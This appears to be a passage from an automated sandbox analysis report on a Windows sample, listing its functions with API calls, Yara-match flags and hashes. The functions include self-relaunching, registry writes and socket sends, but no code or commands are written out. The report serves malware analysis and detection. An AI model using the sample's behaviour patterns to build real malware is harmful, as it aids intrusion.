Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: Message_sprintf
String ID: %s Error$Astrolog
API String ID: 997493000-1827282765
Opcode ID: 41a28cfafc5ebccb8a8684a0edf5737526973cffbf79abfe5558c6dd2cd098da
Instruction ID: c0e0505dfbd803e0b28e17c07bcb3cd32286c036d4b50afd35fde361dbfa1e9e
Opcode Fuzzy Hash: 41a28cfafc5ebccb8a8684a0edf5737526973cffbf79abfe5558c6dd2cd098da
Instruction Fuzzy Hash: 13E01B71A0014CABCF00FFA0C955F9DB7BCEB0535CF504526A90697544DF749608CA91

Function 03D960CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 11registryCOMMON

Download Yara Rule

APIs

Part of subcall function 03D975E0: GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 03D97602
Part of subcall function 03D975E0: GetCommandLineW.KERNEL32 ref: 03D97608
Part of subcall function 03D975E0: GetStartupInfoW.KERNEL32(?), ref: 03D97617
Part of subcall function 03D975E0: CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 03D9763F
Part of subcall function 03D975E0: ExitProcess.KERNEL32 ref: 03D97647

RegCreateKeyW.ADVAPI32(80000001,end,?), ref: 03D960E2
RegCloseKey.ADVAPI32(?), ref: 03D960ED
ExitProcess.KERNEL32 ref: 03D960F5

Strings

end, xrefs: 03D960D8

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Process$CreateExit$CloseCommandFileInfoLineModuleNameStartup
String ID: end
API String ID: 110310128-16528305
Opcode ID: 7315c842559d7cebbf62c1aec7821cae563569f3c6ae847309d788f22ca42270
Instruction ID: 99600ace05e7a9cc4db5fc51be92081f44d526e9d8eb4e29a7d9fea501a74195
Opcode Fuzzy Hash: 7315c842559d7cebbf62c1aec7821cae563569f3c6ae847309d788f22ca42270
Instruction Fuzzy Hash: C0D0C973154200EFD344FBA09C09E6976A8FB4C302F00090DB64A91244EA64D114CB32

Function 03BF6B85 Relevance: 6.4, APIs: 4, Instructions: 394COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 03BF6C04

Part of subcall function 03C098B5: __EH_prolog3.LIBCMT ref: 03C098BC
Part of subcall function 03C098B5: std::_Lockit::_Lockit.LIBCPMT ref: 03C098D2
Part of subcall function 03C098B5: std::locale::_Locimp::_Locimp.LIBCPMT ref: 03C098F4
Part of subcall function 03C098B5: std::locale::_Setgloballocale.LIBCPMT ref: 03C098FE
Part of subcall function 03C098B5: _Yarn.LIBCPMT ref: 03C09914

std::_Lockit::_Lockit.LIBCPMT ref: 03BF6C1C

Memory Dump Source

Source File: 00000006.00000002.3622789502.0000000003BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3bf0000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: std::locale::_$LockitLockit::_std::_$H_prolog3InitLocimpLocimp::_SetgloballocaleYarn
String ID:
API String ID: 3373505166-0
Opcode ID: b65b271b494c4bdb6a9882e652c4900f524fc060c0e14a268b26a88efb3d2cc3
Instruction ID: 2a0fac9cdc235c4cfc6f0939f48b54d181f540b1ea360a4a29f30480c7734098
Opcode Fuzzy Hash: b65b271b494c4bdb6a9882e652c4900f524fc060c0e14a268b26a88efb3d2cc3
Instruction Fuzzy Hash: A1F137B19083809FD330DF68C884B9BFBE9FF88304F44496DE6998B251DB359948CB52

Function 03D983B0 Relevance: 6.4, APIs: 5, Instructions: 140COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000014), ref: 03D983E8
IsBadReadPtr.KERNEL32(?,00000014), ref: 03D984B8
SetLastError.KERNEL32(0000007F), ref: 03D984E3

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Read$ErrorLast
String ID:
API String ID: 2715074504-0
Opcode ID: a8ccd7a380f6d7705ef96936502d643a5bb45e55e647a5681de1b8c24c1f2b43
Instruction ID: ab14f57160c8794f8294694ba2964077ed8899d27671a447473a153897c6e5c3
Opcode Fuzzy Hash: a8ccd7a380f6d7705ef96936502d643a5bb45e55e647a5681de1b8c24c1f2b43
Instruction Fuzzy Hash: 83418D71A00205DBEB10CFA9D880E6AF7FAFF89B14F18859AD84997351D770F901DB90

Function 032B9562 Relevance: 6.1, APIs: 4, Instructions: 109COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtterm.LIBCMT ref: 032B9576
__init_pointers.LIBCMT ref: 032B9628
__calloc_crt.LIBCMT ref: 032B9696

Memory Dump Source

Source File: 00000006.00000002.3622375709.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32b0000_Fj0RhXL.jbxd

Similarity

API ID: __calloc_crt__init_pointers__mtterm
String ID:
API String ID: 2478854527-0
Opcode ID: 8315b22f45023724a3aeb3454028aff8aaf33b483d7882c0affb14de7f68ae95
Instruction ID: 83755df0d7ee8c22c0b150c16db6be7b7a8bf8fc5d332df361b33d821811a500
Opcode Fuzzy Hash: 8315b22f45023724a3aeb3454028aff8aaf33b483d7882c0affb14de7f68ae95
Instruction Fuzzy Hash: CA314D35850B21EFE721EB798C88B8A7EB6EB453A17188126E914DB270FB71C4C0CF50

Function 03DABAE2 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 03DABB16
__isleadbyte_l.LIBCMT ref: 03DABB49
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 03DABB7A
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 03DABBE8

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: f8e2f22377ea6af1c15580b33c930c5f7683dbbb737d982e4a6be640df44ebd0
Instruction ID: 35b8e407d2b81aefe29d225858cb2f5fffd8013df5ab8049f5f101fbc64ea9f6
Opcode Fuzzy Hash: f8e2f22377ea6af1c15580b33c930c5f7683dbbb737d982e4a6be640df44ebd0
Instruction Fuzzy Hash: 4531B431A04645EFDB22DF68C984ABE7BF5FF01310F1949AAE4919B199E330D942DB50

Function 02F0E535 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02F0E569
__isleadbyte_l.LIBCMT ref: 02F0E59C
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 02F0E5CD
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 02F0E63B

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 95c3c4bb14a798fe2796c93eded0783b2f311146c921d5270ca5afdd8ca50992
Instruction ID: 024cf4ee0b68d2b7f102fb4b9f5163b5f609d66035ca892ac554e69ee7000ea0
Opcode Fuzzy Hash: 95c3c4bb14a798fe2796c93eded0783b2f311146c921d5270ca5afdd8ca50992
Instruction Fuzzy Hash: 6031A032A10256EFCF20DFA4C8D4ABE7BA1AF01294B158D68E665DB2D1E730D940EB50

Function 03D843B0 Relevance: 6.1, APIs: 4, Instructions: 70networkCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000139F), ref: 03D8441C

Part of subcall function 03D813B0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 03D813DB

Part of subcall function 03D81310: _memmove.LIBCMT ref: 03D81331

Part of subcall function 03D84210: EnterCriticalSection.KERNEL32(03D84F95,03D84E35,03D842EE,00000000,?,?,03D84E35,?,?,?,?,00000000,000000FF), ref: 03D84218
Part of subcall function 03D84210: LeaveCriticalSection.KERNEL32(03D84F95,?,?,?,00000000,000000FF), ref: 03D84226

Part of subcall function 03D84C50: HeapFree.KERNEL32(?,00000000,?,00000000,03D84E35,?,03D842F8,03D84E35,00000000,?,?,03D84E35,?), ref: 03D84C77

SetLastError.KERNEL32(00000000,?), ref: 03D84407
SetLastError.KERNEL32(00000057), ref: 03D84431
WSAGetLastError.WS2_32(?), ref: 03D84440

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: ErrorLast$CriticalHeapSection$AllocEnterFreeLeave_memmove
String ID:
API String ID: 3765754631-0
Opcode ID: 58adbc943fb11cb69b7a873e25b5f4fc4ec33ecf6eab4f9ce07e67240f4ed7ec
Instruction ID: 6c6b23d7118aec60b509cc7869b2765f4feb6b32ad74a4b3229197b03c4ae162
Opcode Fuzzy Hash: 58adbc943fb11cb69b7a873e25b5f4fc4ec33ecf6eab4f9ce07e67240f4ed7ec
Instruction Fuzzy Hash: 4111A337A05118DBC710FF7AF8849DEB7A8EB84732B0506AAED0CD7300E631A90146E1

Function 02F04370 Relevance: 6.1, APIs: 4, Instructions: 70networkCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000139F), ref: 02F043DC

Part of subcall function 02F013A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 02F013CB

Part of subcall function 02F041D0: EnterCriticalSection.KERNEL32(02F04F85,02F04E25,02F042AE,00000000,?,?,02F04E25,?,?,?,?,00000000,000000FF), ref: 02F041D8
Part of subcall function 02F041D0: LeaveCriticalSection.KERNEL32(02F04F85,?,?,?,00000000,000000FF), ref: 02F041E6

Part of subcall function 02F04C40: HeapFree.KERNEL32(?,00000000,?,00000000,02F04E25,?,02F042B8,02F04E25,00000000,?,?,02F04E25,?), ref: 02F04C67

SetLastError.KERNEL32(00000000,?), ref: 02F043C7
SetLastError.KERNEL32(00000057), ref: 02F043F1
WSAGetLastError.WS2_32(?), ref: 02F04400

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: ErrorLast$CriticalHeapSection$AllocEnterFreeLeave
String ID:
API String ID: 2060118545-0
Opcode ID: c4a5587b3728ce908a5516a2bef07649f6533710e75f84f13e36df5bb138704e
Instruction ID: 51a599da012f1bec40f6ffc276af0ff7e27f5bdbd994a7fba993278ca5202c66
Opcode Fuzzy Hash: c4a5587b3728ce908a5516a2bef07649f6533710e75f84f13e36df5bb138704e
Instruction Fuzzy Hash: 69112332E0101C9B8B10EEA9B8C05EEF7A8EBC83A2B4501AAEE0CD7240D73498115AD0

Function 03D8BC00 Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 03D8BC1F

Part of subcall function 03D9AB04: RtlFreeHeap.NTDLL(00000000,00000000,?,03DA2A36,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE), ref: 03D9AB1A
Part of subcall function 03D9AB04: GetLastError.KERNEL32(00000000,?,03DA2A36,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE,00000000), ref: 03D9AB2C

_free.LIBCMT ref: 03D8BC48
_free.LIBCMT ref: 03D8BC61
_free.LIBCMT ref: 03D8BC7F

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 922e0244e090425e47e1e8106d69cc3ed9408b4bb472ad80454e335cdc804d83
Instruction ID: e97fcba7340fe0bc179200cc0b69cac8d68e5cd815b59f1a2897aa73d57e88da
Opcode Fuzzy Hash: 922e0244e090425e47e1e8106d69cc3ed9408b4bb472ad80454e335cdc804d83
Instruction Fuzzy Hash: B3112EBB91173097DF22EF649880D6BB368EE85E28709455AED086F309DA34F81187F1

Function 03D989F0 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 03D98A13
_free.LIBCMT ref: 03D98A55
GetProcessHeap.KERNEL32(00000000,00000000,03D98815), ref: 03D98A7C
HeapFree.KERNEL32(00000000), ref: 03D98A83

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Heap_free$FreeProcess
String ID:
API String ID: 1072109031-0
Opcode ID: c19cc7b27d6354e0f617b6f9ebff13baf22c9938cdff57f00fb241960bb118f6
Instruction ID: 8e079032183ad32acac3002b5e8a4e4b89423a6b94c95fb78e9196ae6d181593
Opcode Fuzzy Hash: c19cc7b27d6354e0f617b6f9ebff13baf22c9938cdff57f00fb241960bb118f6
Instruction Fuzzy Hash: AA1130726407009BEB30DA65CC45F67B3E5BB85B10F18891DE59A87A80D774F842DB61

Function 03D83BC0 Relevance: 6.1, APIs: 4, Instructions: 58networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,03D83A8B,00000023), ref: 03D83BD2
WSAGetLastError.WS2_32 ref: 03D83BDD
send.WS2_32(?,00000000,00000000,00000000), ref: 03D83C28
WSAGetLastError.WS2_32 ref: 03D83C33

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: ErrorLast$EventSelectsend
String ID:
API String ID: 259408233-0
Opcode ID: 08772e0fb81ee13a2a2aa578cc98d211f34ed6fb7f79c16cf0f9738379257131
Instruction ID: a4180f831977df8a17b48d35c19fb06630163a414b68a1e74e1eb63c81f8f29e
Opcode Fuzzy Hash: 08772e0fb81ee13a2a2aa578cc98d211f34ed6fb7f79c16cf0f9738379257131
Instruction Fuzzy Hash: 171112BA6007009BD364EF79D988A57B6E9FB84B10F100A1DF55ACB780D775F4008B60

Function 02F03BE0 Relevance: 6.1, APIs: 4, Instructions: 58networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,02F03AAB,00000023), ref: 02F03BF2
WSAGetLastError.WS2_32 ref: 02F03BFD
send.WS2_32(?,00000000,00000000,00000000), ref: 02F03C48
WSAGetLastError.WS2_32 ref: 02F03C53

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: ErrorLast$EventSelectsend
String ID:
API String ID: 259408233-0
Opcode ID: 940837e6087146f258fb5bfab7b9f35c540966155ee2ead6ff868b0d76210900
Instruction ID: 1c7892f1eafb2854dd1454dad6066d2a6cc26d09ff586f7f0745d9e9ab2d0370
Opcode Fuzzy Hash: 940837e6087146f258fb5bfab7b9f35c540966155ee2ead6ff868b0d76210900
Instruction Fuzzy Hash: B7115AB6A007009BD3209F79DCC8A57B6E9FBC8764F914A2DE657C7680D771E440AB50

Function 03DACE22 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 03DACE48

Part of subcall function 03DACC74: __fltout2.LIBCMT ref: 03DACC9F

__cftog_l.LIBCMT ref: 03DACE6E
__cftoe_l.LIBCMT ref: 03DACEA0

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 92eceebc9536e7a6da37375bdd196c38bbf0cddb149cc0de6504c8e5bb2a0762
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: EE11807601054EBBCF129E88CD05CEE3F22FB09660F488424FE289A030D736C6B1EB91

Function 032BEE3E Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 032BEE64

Part of subcall function 032BEC90: __fltout2.LIBCMT ref: 032BECBB

__cftog_l.LIBCMT ref: 032BEE8A
__cftoe_l.LIBCMT ref: 032BEEBC

Memory Dump Source

Source File: 00000006.00000002.3622375709.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32b0000_Fj0RhXL.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 2f8d6bd827806290fb32754d189529542191515aae32ad1e252f9de13ae617ff
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 22115E3642024EBBCF129E84EC41CEE3F76BF183A4F4A8415FA2859131D376C5B1AB81

Function 02F0F471 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 02F0F497

Part of subcall function 02F0F2C3: __fltout2.LIBCMT ref: 02F0F2EE

__cftog_l.LIBCMT ref: 02F0F4BD
__cftoe_l.LIBCMT ref: 02F0F4EF

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 148abf8443aea4dab135ecb0e8c4be4eecd1d15feb3ac7e7d1f659a594b561e2
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 6A113D3680014ABBCF225E84DD818EE3F26BB58398B598515FE18594B1DB36C5B1BB81

Function 6C3E7DF3 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6C3E7E19

Part of subcall function 6C3E7C08: __fltout2.LIBCMT ref: 6C3E7C33

__cftog_l.LIBCMT ref: 6C3E7E3F
__cftoe_l.LIBCMT ref: 6C3E7E71

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 843931e506ad9f7667999f9533ecfb8930c9daf0a1febf59d810d17d1cd26479
Instruction ID: de016f36997c0e1fdd04d3a0625643577a91c3a9062a9ba9c0c7c043fb920a39
Opcode Fuzzy Hash: 843931e506ad9f7667999f9533ecfb8930c9daf0a1febf59d810d17d1cd26479
Instruction Fuzzy Hash: BA117B7240019EBBCF125E84CC41CEE3F26BB4E298B158416FA6858536D737C9B5AF82

Function 03D84210 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(03D84F95,03D84E35,03D842EE,00000000,?,?,03D84E35,?,?,?,?,00000000,000000FF), ref: 03D84218
LeaveCriticalSection.KERNEL32(03D84F95,?,?,?,00000000,000000FF), ref: 03D84226
LeaveCriticalSection.KERNEL32(03D84F95), ref: 03D84287
SetEvent.KERNEL32(8520468B), ref: 03D842A2

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterEvent
String ID:
API String ID: 3394196147-0
Opcode ID: 33f2bfdab1cc29bd93cdc859e3ade4394c5bb839ca9ec493ad95fca294b78c03
Instruction ID: 3f1336e7e0c480f132c293cc7897bce8490c9a9e2a9a526fe2e05ce646001030
Opcode Fuzzy Hash: 33f2bfdab1cc29bd93cdc859e3ade4394c5bb839ca9ec493ad95fca294b78c03
Instruction Fuzzy Hash: 0B11F2B2605B06DFD724DF75C584A96B7F9BF88700B14896DE5AA87210EB30EA01CB00

Function 02F041D0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(02F04F85,02F04E25,02F042AE,00000000,?,?,02F04E25,?,?,?,?,00000000,000000FF), ref: 02F041D8
LeaveCriticalSection.KERNEL32(02F04F85,?,?,?,00000000,000000FF), ref: 02F041E6
LeaveCriticalSection.KERNEL32(02F04F85), ref: 02F04247
SetEvent.KERNEL32(8520468B), ref: 02F04262

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: CriticalSection$Leave$EnterEvent
String ID:
API String ID: 3394196147-0
Opcode ID: 85429b2142bfe7b6a9488494d76163f8488ca27869003a5a64eb37c5f03f4c02
Instruction ID: 990b9a1faa7ac74fbec3d5ee981d6004d5290eff9eee6a7a6ff1101e95230bf8
Opcode Fuzzy Hash: 85429b2142bfe7b6a9488494d76163f8488ca27869003a5a64eb37c5f03f4c02
Instruction Fuzzy Hash: F81103B0A01B059FD724CFB4C584A96BBF9BF8C341B95896DE65E87240EB30E801CB40

Function 03D84AE0 Relevance: 6.0, APIs: 4, Instructions: 45timeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM(00000001,?,00000001,?,03D83C1F,?,?,00000001), ref: 03D84AF5
InterlockedIncrement.KERNEL32(00000001), ref: 03D84B04
InterlockedIncrement.KERNEL32(00000001), ref: 03D84B11
timeGetTime.WINMM(?,03D83C1F,?,?,00000001), ref: 03D84B28

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: IncrementInterlockedTimetime
String ID:
API String ID: 159728177-0
Opcode ID: fb90e9b80ce311046df9cf612fae7ee19f1e8ca0d4fe1b5778ad9ce7f668af94
Instruction ID: 6fa930af90182f33d24cb7554b2eb15818b4b28d2c1bd2825db9c50ae60ebb5d
Opcode Fuzzy Hash: fb90e9b80ce311046df9cf612fae7ee19f1e8ca0d4fe1b5778ad9ce7f668af94
Instruction Fuzzy Hash: DD01C8B66007099FC720EF6AD88094AFBF9FF58750700892EE549C7710E674E6448FA0

Function 03D9A039 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

____lc_handle_func.LIBCMT ref: 03D9A039

Part of subcall function 03D9F8D8: __getptd.LIBCMT ref: 03D9F8D8

____lc_collate_cp_func.LIBCMT ref: 03D9A041

Part of subcall function 03D9F8B2: __getptd.LIBCMT ref: 03D9F8B2

_memcmp.LIBCMT ref: 03D9A060
___crtCompareStringA.LIBCMT ref: 03D9A08C

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

